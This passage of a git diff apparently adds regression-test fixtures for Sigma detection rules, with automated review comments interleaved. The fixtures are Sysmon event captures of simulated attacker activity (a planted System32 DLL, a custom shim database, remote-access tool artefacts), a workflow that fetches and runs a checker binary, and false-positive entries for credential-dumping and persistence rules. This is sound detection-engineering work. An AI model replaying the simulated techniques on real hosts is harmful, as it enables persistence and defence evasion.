regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_change_rdp_port/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.json create mode 100644 
regression_data/windows/registry/registry_set/registry_set_change_security_zones/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_disable_administrative_share/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_disable_defender_firewall/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_disable_security_center_notifications/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.evtx create mode 
100644 regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/info.yml create mode 100644 
regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/info.yml create mode 100644 regression_data/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.evtx create mode 100644 regression_data/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.json create mode 100644 regression_data/windows/registry/registry_set/registry_set_special_accounts/info.yml create mode 100644 regression_data/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.evtx create mode 100644 regression_data/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.json create mode 100644 regression_data/windows/sysmon/sysmon_config_modification/info.yml delete mode 100644 rules/windows/registry/registry_add/registry_add_persistence_amsi_providers.yml create mode 100644 rules/windows/registry/registry_set/registry_set_persistence_amsi_providers.yml rename rules/windows/registry/{registry_add/registry_add_persistence_com_key_linking.yml => registry_set/registry_set_persistence_com_key_linking.yml} (70%) rename 
rules/windows/registry/{registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml => registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript.yml} (71%) rename rules/windows/registry/{registry_add/registry_add_pua_sysinternals_execution_via_eula.yml => registry_set/registry_set_pua_sysinternals_execution_via_eula.yml} (78%) rename rules/windows/registry/{registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml => registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula.yml} (91%) rename rules/windows/registry/{registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml => registry_set/registry_set_pua_sysinternals_susp_execution_via_eula.yml} (87%) create mode 100644 tests/regression_tests_runner.py diff --git a/.github/workflows/known-FPs.csv b/.github/workflows/known-FPs.csv index 8da643d5e..7d1ae95bc 100644 --- a/.github/workflows/known-FPs.csv +++ b/.github/workflows/known-FPs.csv @@ -70,4 +70,6 @@ ef9dcfed-690c-4c5d-a9d1-482cd422225c;Browser Execution In Headless Mode;.* 65236ec7-ace0-4f0c-82fd-737b04fd4dcb;EVTX Created In Uncommon Location;Computer: (DESKTOP-6D0DBMB|WinDev2310Eval) de587dce-915e-4218-aac4-835ca6af6f70;Potential Persistence Attempt Via Run Keys Using Reg.EXE;\\Discord\\ 24357373-078f-44ed-9ac4-6d334a668a11;Direct Autorun Keys Modification;Discord\.exe +8fbf3271-1ef6-4e94-8210-03c2317947f6;Cred Dump Tools Dropped Files;Svchost\.exe +c7da8edc-49ae-45a2-9e61-9fd860e4e73d;PUA - Sysinternals Tools Execution - Registry;.* dcff7e85-d01f-4eb5-badd-84e2e6be8294;Windows Default Domain GPO Modification via GPME;Computer: WIN-FPV0DSIC9O6.sigma.fr diff --git a/.github/workflows/regression-tests.yml b/.github/workflows/regression-tests.yml new file mode 100644 index 000000000..ff56eb9e8 --- /dev/null +++ b/.github/workflows/regression-tests.yml 
@@ -0,0 +1,31 @@ +name: Regression Tests + +on: [push, pull_request, workflow_dispatch] + +env: + EVTX_BASELINE_VERSION: v0.8.2 + +jobs: + true-positive-tests: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v5 + + - name: Set up Python + uses: actions/setup-python@v6 + with: + python-version: '3.11' + + - name: Install Python dependencies + run: | + python -m pip install --upgrade pip + pip install pyyaml + + - name: Download evtx-sigma-checker + run: | + wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker + chmod +x evtx-sigma-checker + + - name: Run regression tests + run: | + python tests/regression_tests_runner.py --rules-paths rules rules-emerging-threats rules-threat-hunting --evtx-checker ./evtx-sigma-checker --thor-config tests/thor.yml --ignore-validation 
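Review bot: the `Download evtx-sigma-checker` step fetches a binary from the `NextronSystems/evtx-baseline` release with `wget`, marks it executable and runs it against every rule directory with no integrity check, so the verdict of this workflow depends on whatever that release asset contains at run time; pin a SHA-256 next to `EVTX_BASELINE_VERSION` and verify it before the `chmod +x`, e.g. `echo "<sha256 of the v0.8.2 asset>  evtx-sigma-checker" | sha256sum -c -`. The same concern applies to `actions/checkout@v5` and `actions/setup-python@v6`, pinned to mutable major tags rather than commit SHAs, and to `pip install pyyaml`, which is unpinned. The workflow also declares no `permissions:` block, so the job runs with the repository's default `GITHUB_TOKEN` scope although reading the checkout is all it needs (`permissions: contents: read`). Finally, `--ignore-validation` passed to `tests/regression_tests_runner.py` is not explained anywhere in the hunk; a one-line comment on which validation is skipped and why would save the next reader a trip into the runner.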
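Review bot: in the `known-FPs.csv` hunk, the new entry `c7da8edc-49ae-45a2-9e61-9fd860e4e73d;PUA - Sysinternals Tools Execution - Registry;.*` uses `.*` as its pattern, which excuses every baseline event the rule matches and turns the known-FP check into a no-op for that rule (the only other `.*` in the visible context is the headless-browser entry). If the rule is expected to fire on benign Sysinternals usage in the baseline, narrow the pattern to the host or image that produces it, the way `Computer: (DESKTOP-6D0DBMB|WinDev2310Eval)` and `\\Discord\\` do for their rules, or reconsider the rule level instead. The `Svchost\.exe` pattern added for `8fbf3271-1ef6-4e94-8210-03c2317947f6;Cred Dump Tools Dropped Files` is also loose for a credential-dumping rule: any baseline event mentioning that image name is excused, including one from a process that merely carries the name; matching on the full `System32` path of the legitimate image would keep the exclusion tight.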
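Review bot: the file list adds `regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.jsoncls` beside the `.evtx`/`.json` pair that every other regression directory carries; the `.jsoncls` name looks like an accidentally committed file rather than a format the runner understands, so drop it, or document the extension in `tests/regression_tests_runner.py` if it is intentional. Separately, `registry_add_persistence_amsi_providers.yml` is deleted and `registry_set_persistence_amsi_providers.yml` created, while the four sibling rules moved from `registry_add` to `registry_set` show up as renames (70%-91% similarity); since the regression directory for the new file still uses id `33efc23c-6ea2-4503-8cfe-bdf82ce8f705`, staging it as a rename with the logic change would keep the rule's history attached.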
diff --git a/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx b/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx new file mode 100644 index 0000000000000000000000000000000000000000..21fd14fbbd9d7782d2fe43d8397412572fd13e8e GIT binary patch literal 69632
diff --git a/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.json b/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.json new file mode 100644 index 000000000..8e4e9362e --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.json
@@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:36:29.111126Z" + } + }, + "EventRecordID": 18267, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:36:29.110", + "ProcessGuid": "5AA13A44-0D74-68FC-EB1D-000000004002", + "ProcessId": 5624, + "Image": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\is-3C3LU.tmp\\Advanced_IP_Scanner_2.5.4594.1(1).tmp", + "TargetFilename": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\Advanced IP Scanner 2\\platforms\\qwindows.dll", + "CreationUtcTime": "2025-10-24 10:44:35.897", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/info.yml b/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/info.yml new file mode 100644 index 000000000..1485a4dc0 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/info.yml 
@@ -0,0 +1,13 @@ +id: 48ff85e7-a8ae-43fd-8a8f-16ce51a92183 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: fed85bf9-e075-4280-9159-fbe8a023d6fa + title: Advanced IP Scanner - File Event +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx 
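Review bot: `description: N/A` in this info.yml leaves the test data undocumented. The accompanying JSON shows the event was captured on `ar-win-dc.attackrange.local` on 2025-10-24 while the Advanced IP Scanner installer ran from `%TEMP%`, so a one-line description of how the scenario was produced (installer version, steps taken) would let others reproduce or refresh the capture when the rule changes. The same applies to the other info.yml files added in this PR, all of which carry `description: N/A`.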
diff --git a/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.evtx b/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.evtx new file mode 100644 index 0000000000000000000000000000000000000000..064b8b657635f79f3381cefe8368c96bfb385a14 GIT binary patch literal 69632
diff --git a/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.json b/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.json new file mode 100644 index 000000000..0ead262af --- /dev/null
+++ b/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.json 
@@ -0,0 +1,255 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:34:34.640670Z" + } + }, + "EventRecordID": 14961, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:34:34.634", + "ProcessGuid": "5AA13A44-0D08-68FC-DC1D-000000004002", + "ProcessId": 7760, + "Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe", + "TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\service.conf.new", + "CreationUtcTime": "2025-10-24 23:34:32.457", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:34:34.644616Z" + } + }, + "EventRecordID": 14963, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": 
"2025-10-24 23:34:34.634", + "ProcessGuid": "5AA13A44-0D08-68FC-DC1D-000000004002", + "ProcessId": 7760, + "Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe", + "TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\service.conf~RF2d9c1fe.TMP", + "CreationUtcTime": "2025-10-24 23:34:34.634", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:34:34.649129Z" + } + }, + "EventRecordID": 14985, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:34:34.645", + "ProcessGuid": "5AA13A44-0D08-68FC-DD1D-000000004002", + "ProcessId": 9612, + "Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe", + "TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\user.conf.new", + "CreationUtcTime": "2025-10-24 23:34:32.250", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:34:34.653476Z" + } + }, + 
"EventRecordID": 14988, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:34:34.645", + "ProcessGuid": "5AA13A44-0D08-68FC-DD1D-000000004002", + "ProcessId": 9612, + "Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe", + "TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\user.conf~RF2d9c20d.TMP", + "CreationUtcTime": "2025-10-24 23:34:34.645", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:34:34.655191Z" + } + }, + "EventRecordID": 14990, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:34:34.645", + "ProcessGuid": "5AA13A44-0D08-68FC-DD1D-000000004002", + "ProcessId": 9612, + "Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe", + "TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\user.conf.new", + "CreationUtcTime": "2025-10-24 23:34:32.250", + "User": "ATTACKRANGE\\Administrator" + } + } +} 
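Review bot: in the 0b9ad457 JSON hunk, the file concatenates five top-level objects (EventRecordID 14961, 14963, 14985, 14988 and 14990), so it is not one JSON document and `json.load` will reject it. If the file is meant as a readable companion to the evtx, either wrap the objects in an array or emit one object per line (JSON Lines) so tooling can parse it, and state the convention in the runner. Separately, the fifth event (EventRecordID 14990, `user.conf.new`, UtcTime `2025-10-24 23:34:34.645`, CreationUtcTime `23:34:32.250`) repeats every EventData field of the third (EventRecordID 14985); if that is faithful to the capture it is fine, but please confirm it is not an export artefact, since it affects any event-based match count.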
diff --git a/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/info.yml b/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/info.yml new file mode 100644 index 000000000..b0fd7e356 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_anydesk_artefact/info.yml @@ -0,0 +1,13 @@ +id: 0d7ff9a2-a55c-46c8-b878-4ec4ea8e91ae +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 0b9ad457-2554-44c1-82c2-d56a99c42377 + title: Anydesk Temporary Artefact +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.evtx 
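Review bot: `match_count: 1` in this info.yml needs its semantics pinned down. The evtx export contains five events, three of which create `*.conf.new` files under `\AppData\Roaming\AnyDesk\` and two `*.conf~RF...TMP` files; if the runner counts matching events the expected value should be derived from which of these the rule's selection actually matches, and if it counts matching rules the field name is misleading. A sentence in tests/regression_tests_runner.py or the README saying which it is would make these numbers reviewable.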
diff --git a/regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.evtx b/regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.evtx new file mode 100644 index 0000000000000000000000000000000000000000..a8f65532b756acb0dd8e513b401cbf1838e8c920 GIT binary patch literal 69632
diff --git a/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.json b/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.json new file mode 100644 index 000000000..e1a6beffc --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.json
@@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:38:31.938519Z" + } + }, + "EventRecordID": 20972, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:38:31.936", + "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ProcessId": 10048, + "Image": "C:\\Windows\\system32\\cmd.exe", + "TargetFilename": "C:\\Windows\\System32\\WLBSCTRL.dll", + "CreationUtcTime": "2025-10-24 23:38:31.936", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/info.yml b/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/info.yml new file mode 100644 index 000000000..9af8facb1 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/info.yml @@ -0,0 +1,13 @@ +id: 8da08693-5638-4236-87b1-d04b4fcc5e84 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: df6ecb8b-7822-4f4b-b412-08f524b4576c + title: Creation Of Non-Existent System DLL +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.evtx 
diff --git a/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.evtx b/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.evtx new file mode 100644 index 0000000000000000000000000000000000000000..e758a71f3da007a4a90e8a7e9485289b156860c0 GIT binary patch literal 69632
diff --git a/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.json b/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.json new file mode 100644 index 000000000..a169ce960 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:39:53.705006Z" + } + }, + "EventRecordID": 22566, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:39:53.699", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Windows\\apppatch\\CustomSDB\\my_custom.sdb", + "CreationUtcTime": "2025-10-24 23:39:53.699", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/info.yml b/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/info.yml new file mode 100644 index 000000000..7c66c836a --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/info.yml 
@@ -0,0 +1,13 @@ +id: 094a2fb2-b1fd-4943-9379-c25e7ddb7136 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: ee63c85c-6d51-4d12-ad09-04e25877a947 + title: New Custom Shim Database Created +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.evtx 
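Review bot: `description: N/A` leaves this simulation undocumented, which matters for a regression fixture that will have to be regenerated if the rule's selection ever changes. The companion JSON already shows what was done (explorer.exe creating `C:\Windows\apppatch\CustomSDB\my_custom.sdb` as `ATTACKRANGE\Administrator` on 2025-10-24), so a one-line description stating that, and that the sample was produced by a manual file copy rather than a shim installer, would make the intent of the positive test clear and tell a future maintainer that only the path and extension selection is exercised here.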
